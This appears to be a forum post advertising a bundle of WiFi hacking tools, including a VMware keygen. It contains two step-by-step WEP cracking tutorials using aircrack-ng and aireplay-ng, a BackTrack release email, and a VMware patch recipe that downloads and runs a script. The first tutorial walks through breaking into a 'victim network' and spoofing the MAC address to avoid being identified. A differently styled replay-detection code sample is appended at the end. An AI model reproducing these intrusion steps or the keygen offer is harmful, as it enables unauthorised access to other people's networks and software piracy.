The Best Collection Wifi Hacking Tools | 170 MB

~ Key Features ~
• WirelessKeyView
• Wifi Monster
• NetStumbler
• Easy Wifi Radar
• SmartSniff
• Ettercap
• WinPcap
• CommView
~ Windows Tools 2 ~
• Nmap
• Wirelessmon
• PocketWarrior
• Inssider
• RemoteAnyWhere
• PmoniPacketMon
• ApTools
• WiFiFoFum
• Advanced Port Scanner
• NetSurveyor
~ Backtrack ~
• Download link for BackTrack 4 Pre Release
• Download link for BackTrack 4 Beta Release
• Download link for BackTrack 3 VmWare Image
• Download link for BackTrack 3
• Download link for BackTrack 3 USB Version
~ PDFs & Tutorials ~
• Hacking Wireless Networks
• Cracking WEP and WPA WiFi
• Wifi Hacking
• Hacking Asus WL520gU
• BackTrack PDFs
• WiFi Advanced Fuzzing
• Wifi Security
• Wireless Sniffing WiresHark
• Wireless Hacking Tools
~ Bonus Software ~
• Net Tools
• WepGen
• Cantennator
• Anchorfree
• Cain and Abel
• Wifi Drivers
• Brutus
• VmWare Keygen
• LanHelper
Installing VMWare Workstation 6.5.2 On BackTrack 4
As usual, brand new kernel woes with VMware. Here’s a quick way to patch up VMware 6.5.2 to get the modules to compile. Start by downloading and installing VMWare Workstation 6.5.2.

Once that’s done, run the following commands:
rmmod kvm_intel kvm
echo blacklist kvm >> /etc/modprobe.d/blacklist
cd /tmp
wget www.offensive-security.com/tools/bt4-vmware-workstation-patch.tar.bz2
tar jxpf bt4-vmware-workstation-patch.tar.bz2
chmod 755 vmware-6.5.2-modules-2.6.29-fix*
./vmware-6.5.2-modules-2.6.29-fix.sh
vmware-modconfig --console --install-all
vmware
Done!
Source: Offensive Security

Basic Entry into a WEP Encrypted Network
1. Getting the right tools
Download Backtrack 3. It can be found here:
http://www.remote-exploit.org/backtrack_download.html
The Backtrack 4 beta is out but until it is fully tested (especially if you are a noob) I would get the BT3 setup. The rest of this guide will proceed assuming you downloaded BT3. I downloaded the CD iso and burned it to a cd. Insert your BT3 cd/usb drive and reboot your computer into BT3. I always load into the 3rd boot option from the boot menu. (VESA/KDE) You only have a few seconds before it auto-boots into the 1st option so be ready. The 1st option boots too slowly or not at all so always boot from the 2nd or 3rd. Experiment to see what works best for you.
2. Preparing the victim network for attack
Once in BT3, click the tiny black box in the lower left corner to load up a "Konsole" window. Now we must prep your wireless card.
Type:
airmon-ng
You will see the name of your wireless card. (mine is named "ath0") From here on out, replace "ath0" with the name of your card.
Now type:
airmon-ng stop ath0
then type:
ifconfig wifi0 down
then:
macchanger --mac 00:11:22:33:44:55 wifi0
then:
airmon-ng start wifi0
These steps spoof (fake) your MAC address so that, JUST IN CASE your computer is discovered by someone as you are breaking in, they will not see your REAL MAC address. Moving on...
Now it's time to discover some networks to break into.
Type:
airodump-ng ath0
Now you will see a list of wireless networks start to populate. Some will have a better signal than others and it is a good idea to pick one that has a decent signal otherwise it will take forever to crack or you may not be able to crack it at all.
Once you see the network that you want to crack, do this:
hold down ctrl and tap c
This will stop airodump from populating networks and will freeze the screen so that you can see the info that you need.
**Now from here on out, when I tell you to type a command, you need to replace whatever is in parentheses with what I tell you to from your screen. For example, if I say to type:
-c (channel)
then don't actually type in
-c (channel)
Instead, replace that with whatever the channel number is...so, for example you would type:
-c 6
Can't be much clearer than that...let's continue...
Now find the network that you want to crack and MAKE SURE that it says the encryption for that network is WEP. If it says WPA or any variation of WPA then move on...you can still crack WPA with backtrack and some other tools but it is a whole other ball game and you need to master WEP first.

The Channel number will be under a heading that says "CH".
Now, in the same Konsole window, type:
airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0
The FILE NAME can be whatever you want. This is simply the place where airodump is going to store the packets of info that you receive, to crack later. You don't even put in an extension...just pick a random word that you will remember. I usually make mine "wepkey" because I can always remember it.
**Side Note: if you crack more than one network in the same session, you must have different file names for each one or it won't work. I usually just name them wepkey1, wepkey2, etc.
Once you typed in that last command, the screen of airodump will change and start to show your computer gathering packets. You will also see a heading marked "IV" with a number underneath it. This stands for "Initialization Vector" but in noob terms all this means is "packets of info that contain clues to the password." Once you gain a minimum of 5,000 of these IV's, you can try to crack the password. I've cracked some right at 5,000 and others have taken over 60,000. It just depends on how long and difficult they made the password.
Now you are thinking, "I'm screwed because my IV's are going up really slowly." Well, don't worry, now we are going to trick the router into giving us HUNDREDS of IV's per second.
3. Actually cracking the WEP password
Now leave this Konsole window up and running and open up a 2nd Konsole window. In this one type:
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0

Now you need to open up a 3rd and final Konsole window. This will be where we actually crack the password. Type:
aircrack-ng -b (bssid) (filename)-01.cap
Remember the file name you made up earlier? Mine was "wepkey". Don't put a space in between it and -01.cap here. Type it as you see it. So for me, I would type wepkey-01.cap
Once you have done this you will see aircrack fire up and begin to crack the password. Typically you have to wait for more like 10,000 to 20,000 IV's before it will crack. If this is the case, aircrack will test what you've got so far and then it will say something like "not enough IV's. Retry at 10,000." DON'T DO ANYTHING! It will stay running...it is just letting you know that it is on pause until more IV's are gathered. Once you pass the 10,000 mark it will automatically fire up again and try to crack it. If this fails it will say "not enough IV's. Retry at 15,000." and so on until it finally gets it.

Take note, though, that the password will always be displayed in aircrack with a colon after every 2 characters. So for instance if the password was "secret", it would be displayed as:
se:cr:et
This would obviously be the ASCII format. If it was a HEX encrypted password that was something like "0FKW9427VF" then it would still display as:
0F:KW:94:27:VF
Just omit the colons from the password, boot back into whatever operating system you use, try to connect to the network and type in the password without the colons and presto! You are in!
It may seem like a lot to deal with if you have never done it, but after a few successful attempts, you will get very quick with it. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes.
I am not responsible for what you do with this information. Any malicious/illegal activity that you do, falls completely on you because...technically...this is just for you to test the security of your own network. :-)
I will gladly answer any legitimate questions anyone has to the best of my ability.
HOWEVER, I WILL NOT ANSWER ANYONE THAT IS TOO LAZY TO READ THE WHOLE TUT AND JUST ASKS ME SOME QUESTION THAT I CLEARLY ANSWERED. No one wants to hold your hand through this...read the tut and go experiment until you get it right.
There are rare occasions where someone will use WEP encryption with SKA as well. (Shared Key Authentication) If this is the case, additional steps are needed to associate with the router and therefore, the steps I lined out here will not work. I've only seen this once or twice, though, so you probably won't run into it. If I get motivated, I may throw up a tut on how to crack this in the future.
Credits to :
Tutori4L by :kumalynx
Picture ; edit Phr4ses By Speci4L Security Te4m
backtrack 4 pre-release
Date: Fri, 19 Jun 2009 23:02:32 -0400
From: Mati Aharoni <muts@offensive-security.com>
Subject: [Full-disclosure] BackTrack 4 Pre Release Available for
Download
To: full-disclosure@lists.grok.org.uk
Message-ID:
<8b0e09fc0906192002o2db466d2hecbbfe127211f89@mail.gmail.com>
Content-Type: text/plain; charset=ISO-8859-1
Dear Everyone,
The Remote Exploit team is ecstatic to announce the availability of
BackTrack 4 Pre Release.
BackTrack 4 has undergone many changes - find more about it here :
http://www.offensive-security.com/backtrack4-guide-tutorial.pdf
You can download backtrack 4 pre final here:
http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
If you would like to link to BackTrack, please use the remote-exploit
link above.
Check our Pre Release Blog announcement:
http://www.offensive-security.com/blog/backtrack/backtrack-pre-final-public-release-and-download/
May the sauce be with you,
Remote Exploit Team
WiFi Hacking Videos & Tutorials (Back track)
Requirements:
* Backtrack 3 on CD or USB
* Computer with compatible 802.11 wireless card
* Wireless Access point or WIFI Router using WEP encryption
I will assume that you have downloaded and booted into Backtrack 3. If you haven’t figured that part out, you probably shouldn’t be trying to crack WEP keys. Once Backtrack is loaded, open a shell and do the following:
Preparing The WIFI Card
First we must enable “Monitor Mode” on the wifi card. If using the Intel® PRO/Wireless 3945ABG chipset issue the following commands:
modprobe -r iwl3945
modprobe ipwraw
The above commands will enable monitor mode on the wireless chipset in your computer. Next we must stop your WIFI card:
iwconfig
Take note of your wireless adapter’s interface name. Then stop the adapter by issuing:
airmon-ng stop [device]
Then:
ifconfig [interface] down
Now we must change the MAC address of the adapter:
macchanger --mac 00:11:22:33:44:66 [device]
It's now time to start the card in monitor mode by doing:
airmon-ng start [device]
Attacking The Target
It is now time to locate a suitable WEP enabled network to work with:
airodump-ng [device]
Be sure to note the MAC address (BSSID), channel (CH) and name (ESSID) of the target network. Now we must start collecting data from the WIFI access point for the attack:
airodump-ng -c [channel] -w [network.out] --bssid [bssid] [device]
The above command will output data collected to the file: network.out. This file will be fed into the WEP Crack program when we are ready to crack the WEP key.
Open another shell and leave the previous command running. Now we need to generate some fake packets to the access point to speed up the data output. Test the access point by issuing the following command:
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
If this command is successful we will now generate many packets on the target network so that we can crack the KEY. Type:
aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]
This will force the access point to send out a bunch of packets which we can then use to crack the WEP key. Check your airodump-ng shell and you should see the “data” section filling up with packets.
After about 10,000-20,000 you can begin cracking the WEP key. If there are no other hosts on the target access point generating packets, you can try:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]
Once you have enough packets, you begin the crack:
aircrack-ng -n 128 -b [bssid] [filename]-01.cap
The “-n 128” signifies a 128-bit WEP key. If cracking fails, try a 64-bit key by changing the value of N to 64.
Once the crack is successful you will be left with the KEY! Remove the : from the output and there is your key. So there you have it.
You can use these techniques to demonstrate to others why using WEP is a bad idea. I suggest you use WPA2 encryption on your wireless networks.
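
Seen from the monitoring side, the packet-generation step described above stands out because a replayed WEP frame is resent unchanged, IV included, so one transmitter repeats a single IV hundreds of times a second while normal clients use a fresh IV per frame. The following detection sketch is an added example, not part of the original tutorial; the record layout, the threshold and the sample frames are constructed assumptions.

```python
from collections import defaultdict

# Constructed sample records (not real capture data):
# (timestamp in ms, transmitter MAC, WEP IV as hex) for each WEP data frame.
NORMAL = [(i * 500, "aa:bb:cc:00:00:01", f"{0x1000 + i:06x}") for i in range(20)]
REPLAY = [(2000 + i * 2, "00:11:22:33:44:55", "a1b2c3") for i in range(600)]
FRAMES = NORMAL + REPLAY


def find_replay_sources(frames, window_ms=1000, min_repeats=50):
    """Flag transmitters that resend one IV min_repeats+ times within window_ms.

    Ordinary 802.11 retries also repeat an IV, but only a handful of times,
    so min_repeats (an assumed threshold) must sit well above the retry limit.
    Returns {mac: (iv, peak repeats seen in any window)}.
    """
    stamps_by_key = defaultdict(list)
    for ts, mac, iv in frames:
        stamps_by_key[(mac, iv)].append(ts)

    flagged = {}
    for (mac, iv), stamps in stamps_by_key.items():
        stamps.sort()
        start = peak = 0
        for end, ts in enumerate(stamps):
            # Shrink the window until it spans at most window_ms.
            while ts - stamps[start] > window_ms:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= min_repeats and peak > flagged.get(mac, ("", 0))[1]:
            flagged[mac] = (iv, peak)
    return flagged


if __name__ == "__main__":
    for mac, (iv, peak) in find_replay_sources(FRAMES).items():
        print(f"possible replay injection: {mac} repeated IV {iv} {peak}x in 1 s")
```

An alert from this check on a network you operate is one more reason to retire WEP on that access point in favour of WPA2, as recommended above.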